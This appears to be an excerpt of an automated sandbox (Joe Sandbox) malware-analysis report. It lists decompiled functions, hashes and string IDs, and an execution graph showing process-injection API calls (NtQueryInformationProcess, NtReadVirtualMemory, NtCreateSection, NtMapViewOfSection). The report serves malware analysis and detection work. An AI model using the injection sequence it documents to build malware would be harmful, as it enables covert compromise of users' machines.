                    Function 03C9AFE7 Relevance: 25.3, Strings: 20, Instructions: 255COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                    • API String ID: 0-3236418099
                    • Opcode ID: 5862cd32550569fcbda4b7835447c02b9650c6f60e4ad67d72d48df33767f25a
                    • Instruction ID: c0590c4b5c42adc1db86e3946b4d8b34fba3fdfbe44b356fb86026584a89d5c9
                    • Opcode Fuzzy Hash: 5862cd32550569fcbda4b7835447c02b9650c6f60e4ad67d72d48df33767f25a
                    • Instruction Fuzzy Hash: 1A9161B5D00319AAEB20EF94DC85FEEB7B9AF44704F0541A9E608EA140EB715B84DF61
                    Function 03C969E6 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                    • API String ID: 0-392141074
                    • Opcode ID: 5cebb1740e5f88ec5179f83979617af4a926e2c772e2c152ecd864d12fc48798
                    • Instruction ID: 59d73b37c863757561be93a765a922684707e63f9d91bac95971f791dad8f613
                    • Opcode Fuzzy Hash: 5cebb1740e5f88ec5179f83979617af4a926e2c772e2c152ecd864d12fc48798
                    • Instruction Fuzzy Hash: 25712FB5D10718AADB25EF94CC40FEEB77DBF08704F04419DE608EA180EB7567449B95
                    Function 03C91CD6 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                    • API String ID: 0-2356907671
                    • Opcode ID: 5efd6b896f3c161d912402de7ace7b3629155e4fa029c162924957ad6f496c61
                    • Instruction ID: 767cadad492a36d9b00d652564b499724eab64058e348edce441e1125d6a0a1b
                    • Opcode Fuzzy Hash: 5efd6b896f3c161d912402de7ace7b3629155e4fa029c162924957ad6f496c61
                    • Instruction Fuzzy Hash: 2B81E6B6C003196ADB51EBA8CC80FEF77BDAF44708F0441A9A50CEA141EB755798DFA1
                    Function 03C8AB3E Relevance: 13.8, Strings: 11, Instructions: 85COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                    • API String ID: 0-685823316
                    • Opcode ID: b01e59beeb9904132a8481184cb4c58e87c8b9381759d458ce3843d2d065c611
                    • Instruction ID: 6518e4e4efa642d2d23b0a6c66421f226555b6614494c23d651f0e6b0484049d
                    • Opcode Fuzzy Hash: b01e59beeb9904132a8481184cb4c58e87c8b9381759d458ce3843d2d065c611
                    • Instruction Fuzzy Hash: CB3184B5C15358AEEF50DF94CC84BEEBBB9BF04304F14818DE508BA180DBB51648CB65
                    Function 03C9B496 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: :$:$:$A$I$N$P$m$s$t
                    • API String ID: 0-2304485323
                    • Opcode ID: 6a54a70c63ec86b88be1296287c025cd3f366a766c51788dee5bdf074bcf4b5b
                    • Instruction ID: ed964ea3ab4c578648b6f7bd68c29a9358a1034bc4e51f4c1cc4ab5c980c698e
                    • Opcode Fuzzy Hash: 6a54a70c63ec86b88be1296287c025cd3f366a766c51788dee5bdf074bcf4b5b
                    • Instruction Fuzzy Hash: 3ED109B6901706ABDB14DFA4CD84FEFB7B9BF48304F05451DE109EA240EB79AA11CB61
                    Function 03C833F6 Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #$+$B$O$_$f$g$x
                    • API String ID: 0-4085954075
                    • Opcode ID: 019f54e6892b35cea75aec42b9ee1b1b12f5334d454093a1b1f8d1632532abf1
                    • Instruction ID: 016a1755136b56eb066b2206373a7382ca65edb87646eae31612b4155948e223
                    • Opcode Fuzzy Hash: 019f54e6892b35cea75aec42b9ee1b1b12f5334d454093a1b1f8d1632532abf1
                    • Instruction Fuzzy Hash: CF11BE10D0C7CAD9DB12D7BD84182AEBF715F23228F0882D9D8E56B2D2C2794756C7A6
                    Function 03C9E3C6 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: L$S$\$a$c$e$l
                    • API String ID: 0-3322591375
                    • Opcode ID: 01313ca10768265efefad55ee4f7f91398995eb2dd8e4603dd55faf2ba84bff1
                    • Instruction ID: f387a1897367e4e19fe3823477e46165f693bfd9f8fd0687328d29754290fd4f
                    • Opcode Fuzzy Hash: 01313ca10768265efefad55ee4f7f91398995eb2dd8e4603dd55faf2ba84bff1
                    • Instruction Fuzzy Hash: C3418772C10218AADF20DFA8DC88ADEB7B8FF48714F06815AD90DEB100E77156858BD5
                    Function 03C967AD Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: F$P$T$f$r$x
                    • API String ID: 0-2523166886
                    • Opcode ID: af589b64bcf28765a537ef060956213029c6ee2e281201b51963866dd6805c20
                    • Instruction ID: bcc5beea7acafd8f40351118db9cea863f34eecc2fd9316ff9266b82d1d5c53d
                    • Opcode Fuzzy Hash: af589b64bcf28765a537ef060956213029c6ee2e281201b51963866dd6805c20
                    • Instruction Fuzzy Hash: 94512571900701AAEB34DF68CC48BEAF3FCAF04324F06456BE509DE180E7B4A694CB91
                    Function 03C95F06 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $i$l$o$u
                    • API String ID: 0-2051669658
                    • Opcode ID: 1ad05f86f09832479eac1dad693b9fb1a695d64661f377db71a9d34b38c205d5
                    • Instruction ID: 21042ebaaeec5e658262fecfa681ec45ef73c898db25d4d71ce6acf0d36da56f
                    • Opcode Fuzzy Hash: 1ad05f86f09832479eac1dad693b9fb1a695d64661f377db71a9d34b38c205d5
                    • Instruction Fuzzy Hash: 79618EB5900304AFDB20DBA4CC84FEFB7FCAB48714F154559E55AEB280E735AB418B60
                    Function 03C95B99 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $e$k$o
                    • API String ID: 0-3624523832
                    • Opcode ID: 42312bb7b87d06fad95ba8cef6e2bea7aa0a71caa450060eb251d04dbbe14719
                    • Instruction ID: 6ed54259929128bce2118c417e6df86e1978b5207690d0ae2b7bcd6da5af05f9
                    • Opcode Fuzzy Hash: 42312bb7b87d06fad95ba8cef6e2bea7aa0a71caa450060eb251d04dbbe14719
                    • Instruction Fuzzy Hash: E7B12BB5A00704AFDB25CBA4CC84FEFB7BDAF89700F148559E619EB240DA75AB41CB50
                    Function 03C964A6 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $e$h$o
                    • API String ID: 0-3662636641
                    • Opcode ID: 2c0658d9e3e86cae48040e8b82df610831eac11c1366891266cc59199588b788
                    • Instruction ID: 3cc306e7ded34f933990a57e36810b15fc173c58e12d5f846b6cca708c2c8c92
                    • Opcode Fuzzy Hash: 2c0658d9e3e86cae48040e8b82df610831eac11c1366891266cc59199588b788
                    • Instruction Fuzzy Hash: 287142B69002197EDF64EB54CC84FEF737CAF45704F05429AB549DA040EF7457849BA2
                    Function 03C95BA6 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $e$k$o
                    • API String ID: 0-3624523832
                    • Opcode ID: a6ea1d63f6d5c1ac9407f670987b73d93b1314fcc34a2f9e6f895c9f07bc2ee8
                    • Instruction ID: 8620e6b7c8e553dcb3f56c8af42cb63789bee649a85893c0562eacfde6ad0479
                    • Opcode Fuzzy Hash: a6ea1d63f6d5c1ac9407f670987b73d93b1314fcc34a2f9e6f895c9f07bc2ee8
                    • Instruction Fuzzy Hash: EE612DB5A00704AFDB64DFA4CD88FEFB7BDAF89700F148559A619DB280D731AA41CB50
                    Function 03C95A66 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                    • API String ID: 0-2877786613
                    • Opcode ID: b46b18d91c3611367e98cf093f7de8b89bbe42c0a9d6feeeb6ea08bd1c49b40f
                    • Instruction ID: c3b2ff95636ec1a956a4f6cd48f15b1f90967ce347ac90d9710d4c10c90e564c
                    • Opcode Fuzzy Hash: b46b18d91c3611367e98cf093f7de8b89bbe42c0a9d6feeeb6ea08bd1c49b40f
                    • Instruction Fuzzy Hash: 4D317C75901A197BEB11EB958D42FEF773CAF46604F064058FA00EE180EB746A1687E6
                    Function 03C91FFF Relevance: 5.1, Strings: 4, Instructions: 91COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 039B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_13_2_39b0000_nPzDKsDmTWqJ.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: G$b$c$h
                    • API String ID: 0-3025121880
                    • Opcode ID: 1d94a62005e067a659b0c8c3d71c8d80de8f95a2d1b7edbd00f785c5cbcba92c
                    • Instruction ID: ee559bfd5174a102c6556ebb98bc9cb2ed9ad506bde48e885c2ebb997bb604ae
                    • Opcode Fuzzy Hash: 1d94a62005e067a659b0c8c3d71c8d80de8f95a2d1b7edbd00f785c5cbcba92c
                    • Instruction Fuzzy Hash: C33187B5E10209BBEF14DB98CD45FEE77B8EF04308F058159E904EB240E7769A4487E5

                    Execution Graph

                    Execution Coverage:0.9%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:84
                    Total number of Limit Nodes:6
                    execution_graph 70649 4468785 70670 4402bf0 LdrInitializeThunk 70649->70670 70651 44687cd 70652 446885f 70651->70652 70671 4400634 12 API calls 2 library calls 70651->70671 70654 446887f 70652->70654 70677 4402c70 LdrInitializeThunk 70652->70677 70656 446888a 70654->70656 70678 44802f4 LdrInitializeThunk __except_handler4 70654->70678 70658 44687fb __except_handler4 70669 4468844 70658->70669 70672 448024e LdrInitializeThunk LdrInitializeThunk __except_handler4 70658->70672 70661 446889e 70661->70669 70673 4402fb0 LdrInitializeThunk 70661->70673 70663 44688b0 __except_handler4 70664 44688cf 70663->70664 70663->70669 70679 44802f4 LdrInitializeThunk __except_handler4 70663->70679 70674 4402b60 LdrInitializeThunk 70664->70674 70667 44688d7 70675 4402e80 LdrInitializeThunk 70667->70675 70669->70652 70676 4402b60 LdrInitializeThunk 70669->70676 70670->70651 70671->70658 70672->70661 70673->70663 70674->70667 70675->70669 70676->70652 70677->70654 70678->70656 70679->70664 70681 4402ad0 LdrInitializeThunk 70686 44454f0 70687 444553e 70686->70687 70708 4445548 70687->70708 70721 4402bf0 LdrInitializeThunk 70687->70721 70689 444558d 70720 4445596 __except_handler4 70689->70720 70722 4402c00 70689->70722 70691 44455b6 70693 4402c70 __except_handler4 LdrInitializeThunk 70691->70693 70692 44456d2 70695 44458df 70692->70695 70725 4402d30 LdrInitializeThunk 70692->70725 70696 44455d4 70693->70696 70698 44458ef 70695->70698 70726 4402b60 LdrInitializeThunk 70695->70726 70699 4402bf0 __except_handler4 LdrInitializeThunk 70696->70699 70701 444590c 70698->70701 70727 4402c70 LdrInitializeThunk 70698->70727 70703 44455f6 70699->70703 70702 444591c 70701->70702 70728 4402b60 LdrInitializeThunk 70701->70728 70706 444592c 70702->70706 70729 4402b60 LdrInitializeThunk 70702->70729 70709 4445674 70703->70709 70710 444562d 70703->70710 70703->70720 70706->70708 70730 4402b60 LdrInitializeThunk 70706->70730 70713 4402f30 __except_handler4 LdrInitializeThunk 70709->70713 70712 4445960 566 API calls 70710->70712 70712->70720 70714 444569c 70713->70714 70715 4402d10 __except_handler4 LdrInitializeThunk 70714->70715 70714->70720 70716 44456cc 70715->70716 70716->70692 70717 4402d10 __except_handler4 LdrInitializeThunk 70716->70717 70719 44456fe __except_handler4 70717->70719 70718 4400634 12 API calls 70718->70720 70719->70718 70719->70720 70720->70692 70724 4402d30 LdrInitializeThunk 70720->70724 70721->70689 70731 4402c0a 70722->70731 70724->70692 70725->70695 70726->70698 70727->70701 70728->70702 70729->70706 70730->70708 70732 4402c1f LdrInitializeThunk 70731->70732 70733 4402c11 70731->70733 70734 410f1a5 70735 410f200 70734->70735 70736 410f234 70735->70736 70739 410c3c8 70735->70739 70738 410f211 70740 410c3ed 70739->70740 70741 410c56a NtQueryInformationProcess 70740->70741 70747 410c5dd 70740->70747 70742 410c5a4 70741->70742 70743 410c67b NtReadVirtualMemory 70742->70743 70745 410c6bd 70742->70745 70742->70747 70748 410f308 70743->70748 70745->70747 70752 410f248 70745->70752 70747->70738 70749 410f37d 70748->70749 70750 410f392 70749->70750 70756 410cda8 NtCreateSection NtMapViewOfSection 70749->70756 70750->70747 70753 410f2b5 70752->70753 70755 410f2c7 70753->70755 70757 410ca08 70753->70757 70755->70747 70756->70750 70758 410ca35 70757->70758 70759 410cb3f NtCreateSection 70758->70759 70760 410cb05 70758->70760 70759->70760 70761 410cbed NtMapViewOfSection 70760->70761 70762 410cba7 70760->70762 70761->70762 70762->70755

                    Executed Functions

                    Function 0410CA08 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 355nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034491190.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4100000_clip.jbxd
                    Similarity
                    • API ID: CreateSection
                    • String ID: @$@$@$@
                    • API String ID: 2449625523-3310854385
                    • Opcode ID: d7afe012f486fccd5ae4cb68458048ee7dbb18ecec3a876717ec4a98f3e1979f
                    • Instruction ID: 7d4fa10b55245b7420be50f918a67706914fb31e6c185108e9233885d81cfcce
                    • Opcode Fuzzy Hash: d7afe012f486fccd5ae4cb68458048ee7dbb18ecec3a876717ec4a98f3e1979f
                    • Instruction Fuzzy Hash: EAB18270618B489FDB58DF68D4947AABBE0FF58704F50472EE49AD3290EB70E5018BC6
                    Function 0410C3C8 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 531nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 61 410c3c8-410c3eb 62 410c409-410c429 call 410e658 call 410a3e8 61->62 63 410c3ed-410c404 call 410e638 61->63 69 410c9ef-410c9fa 62->69 70 410c42f-410c53b call 410c2f8 call 410e658 call 41123e4 call 4100308 call 410dc68 call 4100308 call 410dc68 call 41101a8 62->70 63->62 87 410c541-410c5db call 4100308 call 410dc68 NtQueryInformationProcess call 410e658 call 4100308 call 410dc68 70->87 88 410c9e3-410c9ea call 410c2f8 70->88 100 410c5dd-410c5ea 87->100 101 410c5ef-410c66b call 41123f2 call 4100308 call 410dc68 87->101 88->69 100->88 101->100 110 410c671-410c679 call 411241c 101->110 113 410c67b-410c6b3 NtReadVirtualMemory call 410f308 110->113 114 410c6bd-410c703 call 4100308 call 410dc68 call 4110ae8 110->114 117 410c6b8 113->117 123 410c722-410c81e call 4100308 call 410dc68 call 411242a call 4100308 call 410dc68 call 41104c8 call 410e608 * 3 call 411241c 114->123 124 410c705-410c71d 114->124 117->88 147 410c820-410c84c call 411241c call 410e608 call 411247e call 4112438 123->147 148 410c84e-410c855 call 411241c 123->148 124->88 159 410c888-410c892 147->159 153 410c875-410c883 call 410f248 148->153 154 410c857-410c870 call 410fd58 148->154 153->159 154->153 161 410c898-410c8e8 call 4100308 call 410dc68 call 41107d8 call 411241c 159->161 162 410c95a-410c9c3 call 4100308 call 410dc68 call 4110df8 159->162 181 410c91a-410c91e 161->181 182 410c8ea-410c910 call 41124c8 call 411247e 161->182 162->88 189 410c9c5-410c9de call 410e638 162->189 184 410c920-410c928 call 411241c 181->184 185 410c92a-410c935 181->185 182->181 184->162 184->185 185->162 190 410c937-410c955 call 4111108 185->190 189->88 190->162
                    APIs
                    • NtQueryInformationProcess.NTDLL ref: 0410C589
                    • NtReadVirtualMemory.NTDLL ref: 0410C696
                    Strings
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034491190.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4100000_clip.jbxd
                    Similarity
                    • API ID: InformationMemoryProcessQueryReadVirtual
                    • String ID: 0
                    • API String ID: 1498878907-4108050209
                    • Opcode ID: f7013fddbefb5b035c0a082f9b56e4ce07a08035a184605eab8daacf8957dd83
                    • Instruction ID: a3680693a259e41023f0377b3c1ce4b6d843b2939661fc351a7a6192788653bb
                    • Opcode Fuzzy Hash: f7013fddbefb5b035c0a082f9b56e4ce07a08035a184605eab8daacf8957dd83
                    • Instruction Fuzzy Hash: F8022E70518A8C8FDFA9EF68D894AEE77E1FB98304F00462ED44ADB190DF74A641CB41
                    Function 044035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 43ee7eaaf4be6e25a5d2e1faee4afbc6da2f514074cc06f84d516c54cf1d33d4
                    • Instruction ID: 6ad3de6f259a7f7a4bf3767bcf894796585b2bdeffebc2ef33e3a6ca89ed2796
                    • Opcode Fuzzy Hash: 43ee7eaaf4be6e25a5d2e1faee4afbc6da2f514074cc06f84d516c54cf1d33d4
                    • Instruction Fuzzy Hash: 4B90023164550403F5007158451470620058BE1245F65C413A0425569D8799DA5165A2
                    Function 04404650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 401486ffe3ed67b8ae4874dfcb29a3c007deb248c37d8e0c70fbe0cf868e3e8e
                    • Instruction ID: ed30c93c0cb3c3ae08430c3b3ff0f1b0a1043a91828f8e9f3b2a33f26744b090
                    • Opcode Fuzzy Hash: 401486ffe3ed67b8ae4874dfcb29a3c007deb248c37d8e0c70fbe0cf868e3e8e
                    • Instruction Fuzzy Hash: 0A9002716415004365407158480440670059BF2345395C117A0555561C871CD9559269
                    Function 04403090 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ba1dd54a7924bbe7bb2233f3fe7c0f8f1c17a8855879029cfc41f14876ef408a
                    • Instruction ID: a3d7ba9b474d50c9cba5368f8b6fbbdd4f331f4ceb71b824a98989dc33e16a67
                    • Opcode Fuzzy Hash: ba1dd54a7924bbe7bb2233f3fe7c0f8f1c17a8855879029cfc41f14876ef408a
                    • Instruction Fuzzy Hash: 8090023128140803F540715884147071006CBE1645F55C013A0025555D871ADA6566B1
                    Function 04404340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 888025bab0837d87b1d827b0a99dc78fdb40b653525d50ce8024277ce08ad10e
                    • Instruction ID: 89c3b2303f2cb517ddfb73b66c8daf98896566f4a888da1d8b697b939600e474
                    • Opcode Fuzzy Hash: 888025bab0837d87b1d827b0a99dc78fdb40b653525d50ce8024277ce08ad10e
                    • Instruction Fuzzy Hash: 0590023164580013B5407158488454650059BF1345B55C013E0425555C8B18DA565361
                    Function 04402C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 268 4402c60-4402c6c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 067cb95fa071b88f7e6ac7d1adb9f0b9b2e747aaa3eea4803d25973b9318995b
                    • Instruction ID: 702345d465801d5f3e7969f7eefccc64a7323722620f13ffa06a9fcf069e1b08
                    • Opcode Fuzzy Hash: 067cb95fa071b88f7e6ac7d1adb9f0b9b2e747aaa3eea4803d25973b9318995b
                    • Instruction Fuzzy Hash: D890023124140843F50071584404B4610058BF1345F55C017A0125655D8719D9517521
                    Function 04402C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 269 4402c70-4402c7c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 75087595f7c948d0cadba87878a68dedbc95482f5345d51a770b7b9183ecbf68
                    • Instruction ID: e10a939f7f26a76e33cf17c665864f20942635193caa452be6af56f63d173df5
                    • Opcode Fuzzy Hash: 75087595f7c948d0cadba87878a68dedbc95482f5345d51a770b7b9183ecbf68
                    • Instruction Fuzzy Hash: 5090023124148803F5107158840474A10058BE1345F59C413A4425659D8799D9917121
                    Function 04402CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 270 4402ca0-4402cac LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
